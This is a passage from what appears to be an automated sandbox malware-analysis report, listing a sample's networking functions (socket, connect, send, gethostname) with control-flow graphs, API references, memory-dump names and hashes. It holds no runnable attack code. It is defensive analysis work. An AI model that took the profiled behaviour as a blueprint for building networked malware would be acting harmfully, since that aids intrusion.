                                                • Opcode Fuzzy Hash: 1ac98d430172417943b38d9d1c84cb66c8838a6355e32f478b12eb5c7c1e4dde
                                                • Instruction Fuzzy Hash: 4C1127B5A093187BD521AB559C4EF377B6CDBC6B68F45092DBC08D3292DA219C018BF2
                                                Function 003C75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1665 3c75e0-3c75ed 1666 3c75ef-3c75f6 1665->1666 1667 3c7607-3c7629 socket 1665->1667 1666->1667 1668 3c75f8-3c75ff 1666->1668 1669 3c763f-3c7642 1667->1669 1670 3c762b-3c763c call 3c72a0 1667->1670 1671 3c7601-3c7602 1668->1671 1672 3c7643-3c7699 call 3c72a0 call 3ccb20 call 748c50 1668->1672 1670->1669 1671->1667
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: socket
                                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                • API String ID: 98920635-842387772
                                                • Opcode ID: d01c966ee674d13826f74972487be5d32fb6dd1a0b90b62414611b04ed810bc1
                                                • Instruction ID: e777e6cd0d73a326603589ae3843260922df6a45dcb0cf11652042760021a3d4
                                                • Opcode Fuzzy Hash: d01c966ee674d13826f74972487be5d32fb6dd1a0b90b62414611b04ed810bc1
                                                • Instruction Fuzzy Hash: 85118C76F0121137DA11976DAC1AF4B7BA8DFC1738F050928F810D62E2D7118C60CBE1
                                                Function 003FA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1774 3fa150-3fa159 1775 3fa15f-3fa17b 1774->1775 1776 3fa250 1774->1776 1777 3fa249-3fa24f 1775->1777 1778 3fa181-3fa1ce getsockname 1775->1778 1777->1776 1779 3fa1f7-3fa214 call 3fef30 1778->1779 1780 3fa1d0-3fa1f5 call 3dd090 1778->1780 1779->1777 1784 3fa216-3fa23b call 3dd090 1779->1784 1788 3fa240-3fa246 call 404f40 1780->1788 1784->1788 1788->1777
                                                APIs
                                                • getsockname.WS2_32(?,?,00000080), ref: 003FA1C7
                                                Strings
                                                • getsockname() failed with errno %d: %s, xrefs: 003FA1F0
                                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 003FA23B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: getsockname
                                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                • API String ID: 3358416759-2605427207
                                                • Opcode ID: 9dfe6cfb2857cacbfbfc3096fef68710d1d24eba8bfa15fdccaed3bb3d7bd402
                                                • Instruction ID: b9a898bcf63c4d5cd86032fb89f866d4329cf5a39ad1246d87337307f6308a48
                                                • Opcode Fuzzy Hash: 9dfe6cfb2857cacbfbfc3096fef68710d1d24eba8bfa15fdccaed3bb3d7bd402
                                                • Instruction Fuzzy Hash: FD212B71908684BAE6229718DC46FF773BCEFC1328F040615FA8853152FF32598587E2
                                                Function 003DD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1794 3dd5e0-3dd5ee 1795 3dd5f0-3dd604 call 3dd690 1794->1795 1796 3dd652-3dd662 WSAStartup 1794->1796 1802 3dd61b-3dd651 call 3e7620 1795->1802 1803 3dd606-3dd614 1795->1803 1797 3dd664-3dd66f 1796->1797 1798 3dd670-3dd676 1796->1798 1798->1795 1801 3dd67c-3dd68d 1798->1801 1803->1802 1808 3dd616 1803->1808 1808->1802
                                                APIs
                                                • WSAStartup.WS2_32(00000202), ref: 003DD65A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: Startup
                                                • String ID: if_nametoindex$iphlpapi.dll
                                                • API String ID: 724789610-3097795196
                                                • Opcode ID: a5b641bc2a7a3211b0ec9eab9b5a987b7be7e7b5f199432dd825d5969d5436bc
                                                • Instruction ID: efb59f81f8094d95207a8ea7a898ada8e83ebf67fd433d085c6a45839bed1ac6
                                                • Opcode Fuzzy Hash: a5b641bc2a7a3211b0ec9eab9b5a987b7be7e7b5f199432dd825d5969d5436bc
                                                • Instruction Fuzzy Hash: 12012BE1E8438156EF12AB38BD1B72635A05B5230CF86197AD888952D2FB29C959C2D3
                                                Function 0048AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1810 48aa30-48aa64 1812 48aa6a-48aaa7 call 47e730 1810->1812 1813 48ab04-48ab09 1810->1813 1817 48aaa9-48aabd 1812->1817 1818 48ab0e-48ab13 1812->1818 1814 48ae80-48ae89 1813->1814 1819 48ab18-48ab50 1817->1819 1820 48aabf-48aac7 1817->1820 1821 48ae2e 1818->1821 1827 48ab58-48ab6d 1819->1827 1820->1821 1822 48aacd-48ab02 1820->1822 1823 48ae30-48ae4a call 47ea60 call 47ebf0 1821->1823 1822->1827 1835 48ae4c-48ae57 1823->1835 1836 48ae75-48ae7d 1823->1836 1829 48ab6f-48ab73 1827->1829 1830 48ab96-48abab socket 1827->1830 1829->1830 1834 48ab75-48ab8f 1829->1834 1830->1821 1833 48abb1-48abc5 1830->1833 1837 48abd0-48abed ioctlsocket 1833->1837 1838 48abc7-48abca 1833->1838 1834->1833 1851 48ab91 1834->1851 1839 48ae59-48ae5e 1835->1839 1840 48ae6e-48ae6f 1835->1840 1836->1814 1842 48abef-48ac0a 1837->1842 1843 48ac10-48ac14 1837->1843 1838->1837 1841 48ad2e-48ad39 1838->1841 1839->1840 1847 48ae60-48ae6c 1839->1847 1840->1836 1845 48ad3b-48ad4c 1841->1845 1846 48ad52-48ad56 1841->1846 1842->1843 1852 48ae29 1842->1852 1848 48ac16-48ac31 1843->1848 1849 48ac37-48ac41 1843->1849 1845->1846 1845->1852 1846->1852 1853 48ad5c-48ad6b 1846->1853 1847->1836 1848->1849 1848->1852 1855 48ac7a-48ac7e 1849->1855 1856 48ac43-48ac46 1849->1856 1851->1821 1852->1821 1860 48ad70-48ad78 1853->1860 1858 48ac80-48ac9b 1855->1858 1859 48ace7-48ad03 1855->1859 1863 48ac4c-48ac51 1856->1863 1864 48ad04-48ad08 1856->1864 1858->1859 1865 48ac9d-48acc1 1858->1865 1859->1864 1866 48ad7a-48ad7f 1860->1866 1867 48ada0-48adae connect 1860->1867 1863->1864 1869 48ac57-48ac78 1863->1869 1864->1841 1868 48ad0a-48ad28 1864->1868 1870 48acc6-48acd7 1865->1870 1866->1867 1871 48ad81-48ad99 1866->1871 1873 48adb3-48adcf 1867->1873 1868->1841 1868->1852 1869->1870 1870->1852 1879 48acdd-48ace5 1870->1879 1871->1873 1880 48ae8a-48ae91 1873->1880 1881 48add5-48add8 1873->1881 1879->1859 1879->1864 1880->1823 1882 48adda-48addf 1881->1882 1883 48ade1-48adf1 1881->1883 1882->1860 1882->1883 1884 48ae0d-48ae12 1883->1884 1885 48adf3-48ae07 1883->1885 1886 48ae1a-48ae1c call 48af70 1884->1886 1887 48ae14-48ae17 1884->1887 1885->1884 1890 48aea8-48aead 1885->1890 1891 48ae21-48ae23 1886->1891 1887->1886 1890->1823 1892 48ae93-48ae9d 1891->1892 1893 48ae25-48ae27 1891->1893 1894 48aeaf-48aeb1 call 47e760 1892->1894 1895 48ae9f-48aea6 call 47e7c0 1892->1895 1893->1823 1899 48aeb6-48aebe 1894->1899 1895->1899 1900 48af1a-48af1f 1899->1900 1901 48aec0-48aedb call 47e180 1899->1901 1900->1823 1901->1823 1904 48aee1-48aeec 1901->1904 1905 48aeee-48aeff 1904->1905 1906 48af02-48af06 1904->1906 1905->1906 1907 48af08-48af0b 1906->1907 1908 48af0e-48af15 1906->1908 1907->1908 1908->1814
                                                APIs
                                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0048AB9B
                                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0048ABE3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: ioctlsocketsocket
                                                • String ID:
                                                • API String ID: 416004797-0
                                                • Opcode ID: 5cc151660f792164a7dbb04709b954106c8333f0466fb8bdfbd8cb493368b810
                                                • Instruction ID: a7605b1a23f4f375e31d8baa8635b5bb5c5f823595ae93bb3703daea18ba8824
                                                • Opcode Fuzzy Hash: 5cc151660f792164a7dbb04709b954106c8333f0466fb8bdfbd8cb493368b810
                                                • Instruction Fuzzy Hash: ECE1CF706043019BEB20DF14C885B6B77E5AF89304F044E2FF9988B391E7B9E864CB56
                                                Function 003C78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: closesocket
                                                • String ID: FD %s:%d sclose(%d)
                                                • API String ID: 2781271927-3116021458
                                                • Opcode ID: c39d2ee1e58df13f5a1d73c45724f42ee00280e746290bde6d6e538965426d3d
                                                • Instruction ID: 607785e0ad2ab741055bc0754cc9fbd580e650eb9f112eb2bdf2757b1dade6d1
                                                • Opcode Fuzzy Hash: c39d2ee1e58df13f5a1d73c45724f42ee00280e746290bde6d6e538965426d3d
                                                • Instruction Fuzzy Hash: 18D05E3390A2216B85216999AC49C5BABA89ECAF20B160C5CF940B7204D2209C018BE2
                                                Function 0048B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0048B29E,?,00000000,?,?), ref: 0048B0B9
                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00473C41,00000000), ref: 0048B0C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: ErrorLastconnect
                                                • String ID:
                                                • API String ID: 374722065-0
                                                • Opcode ID: def13bc11344cb1a61ec0fd45eda4067c4bc69699e3b2e2d43b5654391069982
                                                • Instruction ID: af2247291ae5b01128b7a6879043f1b2b948a540eebec1b6966283ad8d6e8508
                                                • Opcode Fuzzy Hash: def13bc11344cb1a61ec0fd45eda4067c4bc69699e3b2e2d43b5654391069982
                                                • Instruction Fuzzy Hash: 0301D8323042005FCA206A788C44F6FB399FF8A364F140B26F97CA32E1D72ADD509796
                                                Function 00474950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • gethostname.WS2_32(00000000,00000040), ref: 00474AA5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: gethostname
                                                • String ID:
                                                • API String ID: 144339138-0
                                                • Opcode ID: 95d9c13fab63b095975de0319f87148883216c6ea43757bdc25f8f12f2ad49fa
                                                • Instruction ID: 85c3c1ac3d2f54468a79665ac176ec5e5e711617d21e95b7a2cf7a554dfe9d76
                                                • Opcode Fuzzy Hash: 95d9c13fab63b095975de0319f87148883216c6ea43757bdc25f8f12f2ad49fa
                                                • Instruction Fuzzy Hash: 3751AEB06043009BE7309A75DA497B776D4AF85319F14893EE98E86791E77CEC44CB0A
                                                Function 0048AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • getsockname.WS2_32(?,?,00000080), ref: 0048AFD1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: getsockname
                                                • String ID:
                                                • API String ID: 3358416759-0
                                                • Opcode ID: c32962a8be6e4f549f23cb402a53f969e00de11b700f5fab347fcfe2a8238519
                                                • Instruction ID: a3bf84a9f4a0753a963820c22d7b31d98cf010cc87bd34d3f799aedd8797012c
                                                • Opcode Fuzzy Hash: c32962a8be6e4f549f23cb402a53f969e00de11b700f5fab347fcfe2a8238519
                                                • Instruction Fuzzy Hash: 23119A70808785D6FB268F18D4027F6B3F4EFD1329F109919E69942550F77655C68BC2
                                                Function 0048A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0048A97F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: send
                                                • String ID:
                                                • API String ID: 2809346765-0
                                                • Opcode ID: 06f64945f9f36f3f6bad62a21e67879dd23eafc386196a0f5d62a7e3f2128f64
                                                • Instruction ID: 1738ab3a25fee0ab3eda52142fe7852eacaefb43a219ef77f45582e03b3de833
